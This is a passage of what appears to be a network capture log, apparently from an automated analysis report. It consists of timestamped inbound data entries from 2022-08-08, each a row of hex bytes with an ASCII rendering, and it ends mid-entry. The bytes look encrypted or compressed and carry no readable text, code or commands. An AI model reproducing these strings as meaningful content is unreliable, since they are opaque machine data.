2022-08-08 12:00:14 UTC	32	IN	Data Raw: be 5b d2 4b 1f 01 8e b7 69 b9 58 80 af f8 92 ee 1f f0 ef 98 62 70 20 45 ae 09 04 06 2b 7d 53 0e 22 3f 62 d0 0c a6 7c 1f ed 68 75 b6 7d b4 2a 27 aa e4 3e ed 4e a7 af 3d d8 fd 8a d4 a3 da 35 3f 17 a6 25 6b c3 71 88 d2 b5 34 d1 7a 6c 53 b5 a5 fc 5c 62 c9 62 31 f4 c9 c3 81 c5 08 18 e1 a9 49 ab a8 59 f8 b4 f0 5e be 38 98 36 c5 a3 01 82 e5 e3 b7 65 8b e2 47 46 73 5b a8 4e 14 bb 0b 8f 31 7b ae af 7a 2e 04 15 bc 6f 2f 9a 06 03 fc 5b 93 95 ce 12 72 81 7b 19 11 7c e1 01 aa 91 ae ba 0e 0c 72 56 e6 9c 3b b3 36 b9 a7 15 f8 db 9e 8f 6b 67 94 61 92 86 3c 5a 2c a8 af 9d 12 d8 c8 91 be d9 bf 39 e4 55 46 b2 fe c5 32 1e af 9b 8d 0b 60 67 7a f8 e6 db 6d 7c 39 7a 2c f3 56 30 9f 98 c6 2a e8 99 a4 ac a3 6c 59 29 da 98 67 bd 34 9d 73 fc 67 76 35 3b 29 e8 f8 5b 35 33 48 4b 2d 1f Data Ascii: [KiXbp E+}S"?b\|hu}'>N=5?%kq4zlS\bb1IY^86eGFs[N1{z.o/[r{\|rV;6kga<Z,9UF2`gzm\|9z,V0lY)g4sgv5;)[53HK-
2022-08-08 12:00:14 UTC	36	IN	Data Raw: e7 a5 d5 f4 ea 7c e2 f3 c1 8c 2d da 2c aa 65 a0 53 07 08 8a 71 6f 84 f3 10 2e dc 46 ba 76 09 d2 20 71 d4 be 44 b2 64 c6 9d 29 8e 57 f5 a5 8e fa e5 82 ff 35 8b 09 fd 5e 10 fe 93 ac 0e 13 c6 23 10 6a ab 78 c0 8e 58 bb 29 1c 62 50 23 5e 51 06 42 7b 76 39 af 84 06 d7 23 b0 4f 7e 15 18 3e fb cc 6e 20 ec 28 bb 7f 62 19 23 f6 55 a9 30 b2 8e bf 80 43 3a bb 20 1d 7a 5c dd 67 6b 18 5c e7 16 0e b3 e0 e5 61 a2 2b b8 ea 8a 35 46 08 13 4a 1c e6 37 69 cd 47 d0 55 50 17 78 e0 d2 52 51 6b bc 7c d6 17 b4 bb 41 bb 4c fd f0 fe 1d 4f 26 3d cc 95 b5 06 86 34 b6 74 65 9a 13 46 2d 60 df a6 24 28 d0 e1 65 d0 ff cd eb a1 cc 64 01 61 72 2a c1 b9 ad a3 7a 92 b6 c2 cc 1d 27 7b d6 5d 9c 72 b1 51 d0 25 39 3b 6d dc ad ef ee 25 28 d5 a4 37 41 56 cc 39 cd 91 a9 3e 66 8e e7 e3 6a f1 28 e5 Data Ascii: \|-,eSqo.Fv qDd)W5^#jxX)bP#^QB{v9#O~>n (b#U0C: z\gk\a+5FJ7iGUPxRQk\|ALO&=4teF-`$(edar*z'{]rQ%9;m%(7AV9>fj(
2022-08-08 12:00:14 UTC	40	IN	Data Raw: fc 05 7f 13 79 0f ec f2 68 4d 89 94 24 61 14 b9 20 a3 10 62 d5 56 9a a8 1e 01 3a a2 00 32 24 18 43 e0 83 f6 49 3b 0f a1 87 c1 6c 88 3c e1 7c 46 8c 73 14 25 77 6e cc bc a6 f7 e2 b1 f7 8b 70 80 c6 34 31 16 7b 59 a4 33 de 3b f1 84 af 6e 33 4b d6 50 af 7d 36 da be 84 3e 19 fc d8 d2 27 f2 e3 01 b1 25 aa c0 e3 5a 65 b0 08 9c f6 71 e2 7d ca bf 58 e7 12 b8 9e 93 3c 4f f5 0a d7 53 4d 01 3c 48 d7 49 b4 38 e6 19 69 09 74 7d 4a c9 27 cf ed 79 0c 85 cc 55 40 1d 3a 7c 5c ea e8 cb 4c d4 e2 9c 71 33 e5 4b 62 cb 78 09 97 98 23 4a 20 1f a6 08 55 3d 9e 31 7e 96 25 46 7b d6 61 52 42 6d e3 83 75 7f bc a5 56 fa 9b ed f0 e1 1c f7 08 e6 d5 3d 9d 2d 44 e4 f1 3e a7 61 d3 a0 8b e6 6d 01 7a 4a d3 8a c2 d9 6b a5 0d 90 22 ce a1 03 f7 70 db c1 de b5 da 1c aa e4 19 bb 37 35 2c 5b 09 1d Data Ascii: yhM$a bV:2$CI;l<\|Fs%wnp41{Y3;n3KP}6>'%Zeq}X<OSM<HI8it}J'yU@:\|\Lq3Kbx#J U=1~%F{aRBmuV=-D>amzJk"p75,[
2022-08-08 12:00:14 UTC	44	IN	Data Raw: 6d 63 5e a3 9c 44 af 9d 6b 0b 59 30 a0 c5 2d 4a 00 3d 48 97 b6 43 89 02 61 2a 7f ed 84 7c 34 45 95 89 d0 df 72 4a 5f 30 a7 34 e4 b0 04 4f 84 d5 84 42 35 bf 10 b0 8a ad 62 2c 2f 9f 38 a7 38 d1 6e 63 2a 2f 8b ff e1 5d 5f 7b 28 b5 19 0a d3 93 52 7c ba 61 55 fe 40 1d 4a 6e 8a 92 22 64 06 d0 c6 b7 c1 46 62 ee f3 a4 b7 9c 33 dd bf 62 84 16 c5 91 9a 86 c6 2a f4 19 18 cd b8 5f 0e 4f df c6 b2 51 16 d4 95 1e ce d9 d0 bc f4 55 8f 47 92 7f f4 bb c1 a3 69 f8 d8 ea 7a 39 9a fb 34 d8 a5 f0 bd 68 a5 1a 7a cb b0 d5 fd bd 58 9e 80 e5 d0 1f ca a8 9b 9f 19 4d ce d3 14 92 55 69 ae d5 7f b4 80 51 97 6a 1b 0c d9 31 6f f5 b7 b8 92 2a 30 8c 2e 2a a3 db 83 4e 33 0a 96 c8 95 bc 70 78 0f 5b 81 dc 62 7e a1 ae 17 07 f0 ed 63 5f 20 44 66 53 78 bd f6 d4 9f a0 77 89 04 76 de 42 0c 94 55 Data Ascii: mc^DkY0-J=HCa\|4ErJ_04OB5b,/88nc/]_{(R\|aU@Jn"dFb3b_OQUGiz94hzXMUiQj1o0.*N3px[b~c_ DfSxwvBU
2022-08-08 12:00:14 UTC	48	IN	Data Raw: e3 e3 50 4e 39 84 fd da 7b 7e b2 32 ab 8d 4d 62 71 45 9b 6c b3 39 fa 0f dd 17 e6 4f c9 9a 8e d7 74 99 c3 f3 eb 93 a4 fe b7 8a 6a 46 d6 8b 47 b0 c3 1e 6e 48 b5 e5 1b 23 f5 a8 46 74 34 84 70 70 49 ee 8c 6f e3 1d 48 e1 02 cf 75 54 bc 95 63 34 3e c2 64 a1 ca b2 91 ab 9f ed d5 ae 15 d6 74 80 3b 87 35 c4 0a 6a a7 f1 42 e7 6d 9c 95 ba 16 66 61 57 4f 6b d4 4d 90 89 ff c6 62 58 99 68 a3 40 a6 c2 f5 a1 4a b1 5c 56 7b ef a2 cd c5 08 d1 5b af 0e 28 45 99 14 57 38 1c 2c 5d 8e 8e 24 a9 16 f8 82 1e 89 17 d3 37 46 5a 5f 82 25 dd 71 a0 43 db 54 ed c7 63 3b a3 f8 74 22 07 4c 3b 4c c7 59 5e 13 da 94 4f 1c 49 23 be f0 e2 e8 19 06 cc 98 08 03 62 85 aa 9d 30 16 97 ec 49 dd 93 56 ac ba 95 7a d8 b0 13 ce ba 5b 02 d4 14 fb 27 b4 2e 8c 55 d8 eb a1 8d 83 4f 33 73 e2 6a 8a df e9 bf Data Ascii: PN9{~2MbqEl9OtjFGnH#Ft4ppIoHuTc4>dt;5jBmfaWOkMbXh@J\V{[(EW8,]$7FZ_%qCTc;t"L;LY^OI#b0IVz['.UO3sj
2022-08-08 12:00:14 UTC	52	IN	Data Raw: f7 a9 8f 78 43 ec 4e 64 64 c1 93 9c 95 39 55 38 4c 5a e4 af cd 9e d4 cf 64 17 f4 2f 5d fa f3 5a d8 6b 77 c2 10 57 0f 3e 6d a5 c9 17 ee 45 7a 96 51 e6 c0 17 e0 e2 1f cf a4 41 cd 38 d0 1e 84 a8 14 c4 30 b1 0c c9 65 ad 68 91 84 71 41 5d 97 61 98 fd ea 46 00 ba 28 62 12 aa 0a b3 51 65 9c 65 ab e1 30 8e ba fd 96 69 72 66 89 a0 7c c4 17 02 97 e5 19 0a 9e bc 7d 61 77 57 a6 d2 b7 92 c3 87 eb ad 31 e7 3a 84 77 49 ff e7 82 4d fa 62 53 7a db 56 36 a8 32 c2 68 a4 9a ee 59 6b 9c 09 0a 91 58 82 b6 a0 2a 43 ad 8f 3d 3a 97 ca c1 c5 99 38 20 2a f0 f1 30 d1 f9 54 d3 c7 84 ba e5 76 41 44 b5 91 72 84 bd ca 2d ba 20 63 fc eb 79 55 0e 12 1d 29 00 64 64 83 40 58 47 58 92 ee bd af 3a 1e c3 f2 f5 29 d2 65 da c3 6a d7 73 28 9a 43 4c 45 c7 8d f8 6f 5c 8e 99 f0 09 a5 32 27 96 51 7c Data Ascii: xCNdd9U8LZd/]ZkwW>mEzQA80ehqA]aF(bQee0irf\|}awW1:wIMbSzV62hYkXC=:8 0TvADr- cyU)dd@XGX:)ejs(CLEo\2'Q\|
2022-08-08 12:00:14 UTC	56	IN	Data Raw: c2 e8 c4 cc 84 d2 31 37 40 d3 c0 bb be 5b 1b f1 9a 22 fa 66 62 a5 c2 a1 aa 5b c0 2d 6b a0 1e 7d 84 c2 da bf 1f 99 21 2e 1a 21 be fe 8e f5 a8 19 61 4e b6 41 8f 50 0a 29 86 94 31 d3 5e d1 60 96 e6 1b 52 55 c5 5c 04 fc 20 d6 f3 34 35 46 6d c2 e4 2d 6a d8 fd ba b8 af 25 47 c3 b6 61 51 9d bd 22 05 f2 6c 83 bf 55 fb 80 ee 0e 81 d6 b7 15 bd a3 6e 51 b7 05 ef 4a af 82 77 02 8d b1 b6 11 f2 c6 f6 bb d1 04 24 c6 69 c8 f0 f4 05 d1 c7 62 95 9d c6 70 63 61 a2 f4 cd b0 08 57 11 ee ce 66 60 bf dd d8 27 04 76 22 68 c4 54 41 d9 21 70 d7 45 f4 11 9e 68 e6 10 ba 83 13 ed 18 c1 cb 39 8b 59 f2 d8 2c f0 14 90 fc 6e 14 fa 65 45 2a 49 ba c6 e2 4f d5 36 c5 66 75 b9 01 c3 f6 d4 56 1f 92 25 94 65 c9 42 4c 02 09 ea 65 48 91 0a f5 fb 94 75 cf 8b 87 1a 88 34 95 7a 75 1a dc 4d ad c3 cd Data Ascii: 17@["fb[-k}!.!aNAP)1^`RU\ 45Fm-j%GaQ"lUnQJw$ibpcaWf`'v"hTA!pEh9Y,neE*IO6fuV%eBLeHu4zuM
2022-08-08 12:00:14 UTC	60	IN	Data Raw: 4b 7f bd c1 a0 d4 fa 5c 56 64 57 c8 b6 41 41 a5 6c 9b 54 1b 7a 44 cb 8f 5b fc 18 99 36 d4 27 3f 5d 5f 89 c4 64 4c ee d7 56 d8 63 57 77 4a d0 1a e1 ee b0 b1 b2 24 32 c1 e8 bd b6 60 34 11 d9 36 45 bd 2a 8d bb 6b fe b8 f0 69 33 e8 78 87 11 79 a9 90 5d 1b d1 c3 cb cc e2 33 24 4d 22 1c ec 1d 84 5a de 02 b6 5c ca ae 2d 6a 60 aa c7 df d8 79 97 2f 13 aa 50 cd 48 4c 9f ce 2b 3f b7 11 5c 2f d7 00 7e 4f d1 66 1d 40 f5 87 75 78 c6 21 55 f6 ec 9d 75 e6 c7 66 9d 14 ea 70 2f f0 d5 0d 56 d7 c5 84 9f 21 2a 4b 53 09 2d 5b 66 60 cf f1 e0 27 43 52 4d 62 bb db 79 18 16 52 43 5d 9c 5a 64 58 62 28 ac 90 fb 38 62 0d c2 79 25 63 0b d1 d7 55 6b fa 00 98 c3 21 8d 83 76 c8 c3 4e 9d a5 7a 45 87 a8 bd d4 82 27 a8 9d 29 ec cc 6f 64 cf c9 be 49 13 93 48 e9 2b ee 12 4a 98 11 aa cf 57 1d Data Ascii: K\VdWAAlTzD[6'?]_dLVcWwJ$2`46Eki3xy]3$M"Z\-j`y/PHL+?\/~Of@ux!Uufp/V!KS-[f`'CRMbyRC]ZdXb(8by%cUk!vNzE')odIH+JW
2022-08-08 12:00:14 UTC	64	IN	Data Raw: 37 db 0a 90 8c ff 69 b2 cc 5e d6 42 0a 90 17 09 f9 60 55 d1 79 1c ff 70 6d 43 6a 98 5d 43 84 13 ff 47 c7 90 8c 55 7c a4 e2 d4 4a a2 6d 3b df a4 fc e6 b4 96 ee e0 21 05 07 cc 61 5e e0 60 7b ce c0 11 c7 d7 cf c5 4b 7a ac c4 d0 43 62 cc 9b d1 11 42 2f d6 a0 d1 39 e1 04 ae 71 42 be 1f cd 9d be cd 22 3c 5b fe 84 38 f1 03 c8 87 4f e4 a8 05 8f 0d b9 c9 50 58 81 7f 07 16 69 c9 17 75 cc d1 8e 8e dc 56 8c a0 4f 23 a4 53 47 64 15 5f e6 29 9a f8 43 ba 8e 6d 47 b0 8e 8c de c9 d2 e6 bd 2a 19 b6 ec f4 ce 05 07 1c e3 a5 e5 b8 eb d9 6e 8d a4 cd c7 62 c1 89 1a 07 89 02 64 67 fe 56 e0 fb c5 fe fb 58 e6 90 4c f0 13 c3 d8 07 c2 ee 3d cb 51 a0 54 04 5d 62 da 90 25 65 69 54 ca 9a fc 98 6d 4e 53 98 fe 0d a0 c9 51 a2 c9 d2 99 90 bb 42 b8 26 78 c6 a1 4f 25 91 b7 0a 90 6c 3c 8c 20 Data Ascii: 7i^B`UypmCj]CGU\|Jm;!a^`{KzCbB/9qB"<[8OPXiuVO#SGd_)CmG*nbdgVXL=QT]b%eiTmNSQB&xO%l<
2022-08-08 12:00:14 UTC	68	IN	Data Raw: e9 9b 15 c9 62 50 52 14 9a 01 f5 11 c9 cf 37 66 c9 dc 5c 0a 39 c8 04 23 3f 6e 46 b9 58 b4 17 f5 1b 62 da 46 1b 65 2e c0 24 4b bb 5e d3 b8 e3 6c 6b 19 29 a1 d6 36 ba 9e 64 58 d9 11 f5 b0 34 55 ad 54 c3 e3 87 f1 ae 2a c6 9b 25 37 41 30 d5 13 cf c7 e3 a2 68 b2 34 57 36 93 8a 86 2a 13 07 88 66 9e 16 3b 5a 26 ca 56 60 1e d7 80 bc 76 a0 86 f8 e2 c1 d7 d1 5a 95 d7 06 e6 55 66 9c 54 59 c6 59 aa 17 1a cd f6 ec 55 b0 8e d0 45 53 3d 59 4f d6 c5 e2 30 64 66 da 0a f6 88 37 49 dc c5 8f 53 0a 6b 5e 0c cc 64 05 34 5e 5c 1d 86 df 35 58 cf 45 72 6c f3 f8 33 71 a3 1b b0 c4 fb 66 e0 d3 a7 ac f5 1a 07 86 a5 5c ca 3e 2e c9 ce d0 41 51 c8 53 81 4b 39 e6 ca d5 5e 50 c9 c9 4f 95 1b 5e 40 1b 7e e3 24 15 ed 9d 58 4b 46 b5 d3 45 4d 5e c1 0e 34 18 b1 2c ab d1 5e 5c c9 cb 4b 8f ba bb Data Ascii: bPR7f\9#?nFXbFe.$K^lk)6dX4UT%7A0h4W6f;Z&V`vZUfTYYUES=YO0df7ISk^d4^\5XErl3qf\>.AQSK9^PO^@~$XKFEM^4,^\K
2022-08-08 12:00:14 UTC	72	IN	Data Raw: 0b e5 58 21 31 b6 99 aa 33 79 da 1d e2 9b 31 45 a7 bc 1f 99 bb d1 d7 c0 f1 bc ae 66 58 fc 3d 26 b3 c4 66 92 ae 66 c3 de 37 d8 b7 d5 4b a7 66 44 29 c1 ee 47 64 c0 89 d0 4e 05 16 0f 88 80 5a c4 b0 cf b3 b8 21 c0 b5 c4 1d 7f 51 29 ce 40 29 e6 32 21 1d a7 58 5c 4e 3e dd c4 c0 66 5e f2 04 12 b7 23 cf 8e b8 5e 5c ce c0 3f a3 60 43 a5 62 b1 b8 6e 0a 11 07 80 48 2b 2d c2 91 ca b4 b7 35 3b 34 19 be 9d 66 bb d7 20 7a a8 b0 c9 50 f8 d0 22 36 b4 64 a0 37 50 c9 ca ac e4 3c 52 49 40 5e 32 37 87 22 5f 61 bb aa 69 c8 e8 04 34 cc ec 8f a6 a0 6e 4a 33 2d b2 2c c2 37 1a 55 1b e4 b3 c4 ca 9f 2b 19 a3 c3 b9 60 cd 6a be ae 62 52 f2 d6 81 2e c2 d5 13 b2 5e cd 45 b4 41 2c 48 47 2c 66 34 a8 85 c4 0b 26 15 20 15 fd e9 bb a8 35 16 da d7 46 b6 c6 99 c7 c3 bd 75 f1 35 37 c1 c9 71 55 Data Ascii: X!13y1EfX=&ff7KfD)GdNZ!Q)@)2!X\N>f^#^\?`CbnH+-5;4f zP"6d7P<RI@^27"_ai4nJ3-,7U+`jbR.^EA,HG,f4& 5Fu57qU
2022-08-08 12:00:14 UTC	76	IN	Data Raw: f3 37 c2 23 25 da 46 5c b9 1b bb dd bb 66 5e 16 7a 2b 31 c7 c3 25 d7 71 2a 99 e0 95 4f 48 4d 99 33 e6 9b 5c c9 f0 aa 7e 2b 26 cd 1b 54 66 27 37 9c ae dc 3c 5c be b7 cd c7 5d 0b d9 35 2d ba a8 4f a3 bb 5e bc d2 e3 35 d6 3b cb c9 fe 6a 6e b8 d5 0b 48 45 28 2b 43 d2 27 c5 c5 5b d7 92 e2 17 50 c2 42 c3 c5 5b bb 7e 56 4d e2 56 79 2d bf ef 3d 97 ef 57 b8 2b 1e d4 26 62 7d 68 c1 26 4b 0e 3b 7f 4d 49 20 de 24 f6 ac 40 17 93 3d 20 c2 58 13 a8 5e cd 73 bb a2 c9 50 ca c9 bb 4d b1 ca a0 56 dc 2c e5 4f 57 f5 e6 ce f5 e6 dc 89 61 5a dc 99 d7 75 6f d7 c9 64 3f 8b 2c b6 ae 44 5c bb 21 5e 54 45 26 4e 98 66 23 f6 3b 79 90 f5 42 13 07 13 c1 24 4d 52 cd f8 ef 6a 23 2f c9 4d a5 b4 98 6e 51 2d 1e d6 f1 2c c1 cd e5 6d e9 66 47 de 37 c0 17 28 c3 5c a8 78 dd c5 52 d7 c9 cb ce 91 Data Ascii: 7#%F\f^z+1%q*OHM3\~+&Tf'7<\]5-O^5;jnHE(+C'[PB[~VMVy-=W+&b}h&K;MI $@= X^sPMV,OWaZuod?,D\!^TE&Nf#;yB$MRj#/MnQ-,mfG7(\xR
2022-08-08 12:00:14 UTC	80	IN	Data Raw: 07 62 17 c3 8c c9 50 cb 8e 89 d1 56 73 5d 86 23 58 5c 54 33 d6 ad 54 54 ae 29 f1 1b 2f c9 cd 52 d6 3a 30 d5 13 5e 94 58 d3 b4 98 84 23 33 cf cd 5e c0 40 a1 64 9a 60 03 54 66 75 6e df d7 52 4c 4d 9f 39 94 b4 d3 c3 54 e0 de 2e 2d 58 66 b9 60 96 70 59 b9 c9 ee c9 f1 c3 60 c1 c4 da 55 09 bd 33 c8 05 b9 f9 c5 0f 72 3b 20 c3 67 58 6b db 4f 0c 35 db 04 cf 50 5e 2b b7 46 2f bb d1 5c 62 92 8f 65 66 58 5c 51 ca 35 48 55 23 7b 4b d3 3c c9 d1 f5 db df 2b 21 c1 a2 d1 9c 56 ee f3 97 05 5c d3 c0 af f1 07 9c c1 de 18 0f 94 02 0f 90 c5 41 0a 9a 8e 07 fb d5 e6 1e c9 c3 62 43 6c 4b 0a c5 c4 c9 45 6a 4d 20 62 2b c1 62 83 3d 97 5c 66 cf 4e 1a d4 26 60 bb 54 5c 1a 4b 0e 66 50 b9 d5 24 de 24 c7 60 52 29 7f 3d 20 60 27 66 b4 12 41 8b bb c7 c9 b8 7b 45 7b d1 bc cb ca 0a dc 20 cd Data Ascii: bPVs]#X\T3TT)/R:0^X#3^@d`TfunRLM9T.-Xf`pY`U3r; gXkO5P^+F/\befX\Q5HU#{K<+!V\AbClKEjM b+b=\fN&`T\KfP$$`R)= `'fA{E{
2022-08-08 12:00:14 UTC	84	IN	Data Raw: 03 31 7e 37 1f e3 c4 21 8f f6 b4 aa a7 b6 0a 9f 6b bd eb b3 6b 31 5c 25 60 66 95 4a 56 a5 95 3e e6 1a 65 27 7a 56 bb 8c 62 f8 44 b2 1f 1f 24 a5 a5 c3 cd 66 ab 0d 3c 0c d9 68 21 e4 b2 10 56 56 07 aa e2 74 08 14 5b b9 a9 85 2e 4f b4 88 51 72 7b 97 d4 84 07 05 3b 70 80 a0 09 eb 2a 80 b1 52 b2 1d 2d ae 6f 8c f1 b8 d8 3e 3a 40 70 37 8a 3b d3 7d 31 89 ad 63 f1 c0 f7 59 c4 00 5d c3 f0 f9 86 84 bb 3a 9a 25 e8 ef 8b c6 81 35 d8 e7 05 a7 3f 6b ff 32 55 a4 bc 58 4a 2f 35 25 6c 14 1d dc d6 61 91 b8 33 94 0a 25 d8 28 42 1a 07 b9 9c 8e 54 ea 0b e0 e1 b9 70 30 e1 78 8a 7d 36 52 5e ae d6 de 78 63 51 9a df 45 d5 62 5e 96 ae c8 9b eb e2 b6 26 61 12 79 b6 13 10 12 91 4c 7b f3 46 c5 d7 ae c0 f3 7d 08 a4 bc dc af cf b9 5d 91 d5 7b 27 ad b3 19 c0 90 99 45 81 7a e8 d9 b7 89 ba Data Ascii: 1~7!kk1\%`fJV>e'zVbD$f<h!VVt[.OQr{;p*R-o>:@p7;}1cY]:%5?k2UXJ/5%la3%(BTp0x}6R^xcQEb^&ayL{F}]{'Ez
2022-08-08 12:00:14 UTC	88	IN	Data Raw: 92 a7 81 c4 5b 55 9d 34 3d 44 69 98 f9 6c ad 99 f2 02 5b 17 63 a5 4c 87 c9 53 63 76 d9 de 3c cb e1 2e e2 33 70 b2 5b 4d e1 c4 a6 c0 f9 fd d0 bb 41 d9 f0 7f 8f de a6 76 47 a1 bd 3c 37 e6 4a 5b 02 2a a1 2b d7 7b a5 42 d3 c8 76 b3 7b bd 91 a0 f1 4f 91 44 2c 4f 43 94 70 a3 c7 d8 6f 8f 85 a4 ae 6a 3a a7 a5 71 94 bc 13 db 3f 54 25 98 67 f0 d3 b7 90 8d 97 93 b4 a1 99 27 3f fe 55 0f 1f 78 b5 23 6c a1 bf fe 4a 8b 10 6d e9 1e 51 6c 3e b7 2c d6 00 19 c8 da a3 09 99 3c 69 a2 1e 1d 69 fa d3 d0 27 a0 53 4e e3 e0 f5 d9 f4 d2 f3 df 9a bc a0 f5 f1 c2 2a 50 cf dc c3 f6 be af 7e 77 f1 26 51 98 93 74 a6 a8 59 8f fd 8c 74 29 63 04 2d 49 f2 8b 1a 23 3d 8b 35 74 45 d6 7a 30 3f 0a 5f b5 61 15 cd d9 06 ea 9f e9 85 13 ec c0 d5 7f 82 62 53 c5 b3 ff 06 d6 c3 5f 95 bf cd 6f 8f f1 d5 Data Ascii: [U4=Dil[cLScv<.3p[MAvG<7J[+{Bv{OD,OCpoj:q?T%g'?Ux#lJmQl>,<ii'SNP~w&QtYt)c-I#=5tEz0?_abS_o
2022-08-08 12:00:14 UTC	92	IN	Data Raw: 33 3e 9a 6f 5b 2c fe 88 74 57 cb be 3d 73 77 35 42 5d 98 c3 b9 d4 33 63 c8 d4 3f 8c 2f 6f 88 c9 60 fd e2 91 3b d2 a7 19 96 22 3f 1f 4d 39 25 0a e6 f5 da b5 c9 cd 98 f1 e1 19 19 57 27 f7 37 44 5a d4 99 c7 c3 56 b6 e6 27 ec 5b 49 62 50 52 b4 45 b0 cd 54 e4 d3 7b 4b 58 cf 8a ae 6c ba c9 b6 a0 a1 c3 b9 58 34 ce ac c9 4d 5a 4d dc 35 95 4d 58 66 9c bf f5 52 3e 1b f1 d4 2e 58 c3 39 03 f3 c6 33 c1 58 cb e7 a3 3e 52 49 40 4a d7 0f a6 7a ba cd 56 c5 e1 30 2e 35 86 4d 2c d3 c1 da 66 e3 bc d3 09 f5 31 40 2f 95 f9 ef b3 a0 96 64 f9 87 49 bb 85 55 60 52 ea 65 7a b0 dd 53 36 ba b0 d4 a3 31 11 8d 4d ea 85 e4 50 cb 13 7b e9 1b f3 2b 9b 50 c9 13 93 84 e1 b4 ce c5 bb 66 cf e7 d6 e4 22 25 c3 c5 64 d5 fd cf 50 cd 6e af 46 80 3f 36 2d cd 58 c9 e3 49 9f cf 60 9e 6b 7e b8 1b 56 Data Ascii: 3>o[,tW=sw5B]3c?/o`;"?M9%W'7DZV'[IbPRET{KXlX4MZM5MXfR>.X93X>RI@JzV0.5M,f1@/dIU`RezS61MP{+Pf"%dPnF?6-XI`k~V
2022-08-08 12:00:14 UTC	96	IN	Data Raw: c5 96 c5 d7 51 d6 86 ac c1 bc b7 81 11 eb 0f 04 48 45 e4 2f 1a 55 d7 20 3b 48 5e 15 4a cf e2 46 cd d4 a5 52 cd cc b0 6a e1 3b da 31 2d 80 b8 3c bc ed e6 3c 37 d5 b7 e7 37 b7 d1 56 53 2e 86 a8 2b c5 47 9b aa c4 b9 42 86 29 2c d7 9c 53 ce 8e f3 fb 6f f1 ca 55 31 95 4f 50 c1 e4 33 e9 56 d0 e2 37 bb 13 58 cf d8 04 6c be b8 bf 71 a3 1b b9 58 62 44 51 c6 1c e8 c1 d7 d3 a7 dc 19 68 61 7a 49 49 a2 f1 17 3b cb c9 52 c9 8d e7 51 55 f5 64 cd c3 5c 99 41 40 f1 e6 dc d1 7f 4f 75 cc 6d f3 1b dc 19 ca 9b c1 c9 62 2c 42 99 87 55 9b 5c c9 a0 c0 7e 2b 33 20 da b3 8b 8c 68 42 92 83 5b f9 58 8c eb 5d 4c f0 a8 23 07 2c bc 39 52 d6 4a 28 bc cd 69 5f f3 3a 36 7f 07 d9 2e 01 5e 50 c9 5e 8b fd 09 c6 79 c8 bb 66 c3 0d 7a 31 2f 56 52 50 f3 e6 a1 33 23 58 d3 cb ed 9b 3c 29 d1 95 e4 Data Ascii: QHE/U ;H^JFRj;1-<<77VS.+GB),SoU1OP3V7XlqXbDQhazII;RQUd\A@Oumb,BU\~+3 hB[X]L#,9RJ(i_:6.^P^yfz1/VRP3#X<)
2022-08-08 12:00:14 UTC	100	IN	Data Raw: 5c b9 50 bd b3 af 66 58 54 bc 80 35 aa be 40 d7 c9 5c aa 3f 5a 22 bd c1 5c d0 fe 86 be a1 4b 40 66 58 55 81 6e 27 2b 32 19 40 66 96 b9 58 5a 4a 53 42 62 52 bb 23 4f 5a 20 d5 66 bb 55 37 7a 19 d9 4d b7 cb c9 c8 e3 6e b8 b8 7e ae 2e cd 96 5c b9 50 bd 3b af 66 58 54 3e 80 35 25 c7 4f 32 c9 66 64 35 57 d1 10 4c 5c bb da e0 84 ba 97 4b a1 58 cf da c7 6c 2b b8 7f 43 a1 c3 8c 58 60 48 d5 a9 a7 52 c1 64 9a e6 21 d1 4e d6 b2 91 4f bb b9 ac 34 55 2c 52 d1 c8 26 ed 2d 1d e9 33 44 62 8c 4a c5 bf 52 49 2c c3 62 51 d3 df c3 c5 d7 d5 66 5e bb 1d dc 79 23 5c bb cd 5e 07 c9 cf bd 5e 2e 2a 60 56 54 66 67 9b 40 4e 4f d2 e9 a5 ba 24 ca b2 04 44 2f c9 17 a5 31 ba bb 5e 60 9e 47 b8 89 3f cb 62 52 fa 86 47 1c 5e 9e c9 0b f7 d0 10 4a 17 c5 3d 8f 45 0a 26 c6 57 9e c3 4e d7 02 0e Data Ascii: \PfXT5@\?Z"\K@fXUn'+2@fXZJSBbR#OZ fU7zMn~.\P;fXT>5%O2fd5WL\KXl+CX`HRd!NO4U,R&-3DbJRI,bQf^y#\^^.*`VTfg@NO$D/1^`G?bRG^J=E&WN
2022-08-08 12:00:14 UTC	104	IN	Data Raw: 3d 49 52 d1 08 1f 89 53 50 c9 36 1a 84 21 27 48 4c 6d 30 89 1d a5 58 5c 3c bc dd 35 e9 e2 99 49 a6 d3 3f b9 20 d6 b9 9b 5c c9 34 7e 7e c4 bc 80 da b3 66 5a c7 3d da c2 48 57 60 52 cd b5 de 33 74 d8 04 95 4d 70 a3 bb 5e 65 0b e3 d1 2c 19 c6 58 c3 66 fd 34 32 cd 05 c9 98 c3 5c 71 41 dd ac a8 66 58 54 09 9f 9b b8 96 c5 a2 c9 66 34 cb f1 31 c1 50 cb 90 de 99 31 49 31 40 66 0d 37 bc c7 c5 d1 35 4b b3 4d 9a 12 fa d1 c3 cb 3a e0 33 2f bf dc 25 1c 55 66 bb a5 81 7a a8 48 58 c7 a0 e6 b5 60 c7 ec f5 86 19 c4 5c 52 cb 92 e6 a9 42 56 8b e4 c3 62 a3 df df 21 77 a2 58 d7 c9 8a 2e a5 c3 94 ac 87 dc cf cd 5f d3 df 2f 2b 5e d1 c1 ff 49 9d 54 92 66 96 21 bd d1 c3 5a 8c ce 3e ca 8e cd 95 4d 58 66 bb f9 87 62 bb b3 60 68 29 58 c3 66 fd 2c 32 a0 ff 8e 5c 52 cb 90 e6 81 c8 13 Data Ascii: =IRSP6!'HLm0X\<5I? \4~~fZ=HW`R3tMp^e,Xf42\qAfXTf41P1I1@f75KM:3/%UfzHX`\RBVb!wX._/+^ITf!Z>MXfb`h)Xf,2\R
2022-08-08 12:00:14 UTC	108	IN	Data Raw: f1 d1 c9 d7 a8 51 55 52 25 d2 bd dc e0 f5 ac da 76 47 de 5e 63 c9 45 e7 d0 10 4a 5b c5 ee df 45 0a 62 69 5c 59 ef 49 1e c9 77 5e a6 d9 ce 79 c1 bc f0 e4 56 d0 20 c2 19 5c 1f c3 cc 7f 82 ca 51 9e 7d ca c8 87 d4 4b 10 41 cc 24 de ca 93 3d e2 f9 58 60 57 20 d7 25 bf 55 20 09 29 58 c3 60 b4 2c 32 6c f2 89 6f 89 d0 d2 13 dd 41 41 35 c9 c3 62 96 14 51 96 8d 3b e2 ff 95 63 c9 62 50 07 14 95 3d 55 05 c9 cf c7 a6 10 83 cc 3d 0d 66 5a c7 8a 0e 91 55 53 f9 52 cd c7 f9 1a 91 3b da 90 60 58 66 49 16 79 ce d0 a1 45 3b b7 45 39 b1 da e0 b1 d2 3b a3 41 c8 05 79 e8 ad 49 41 8e c9 c3 62 8a 14 a9 4f ce 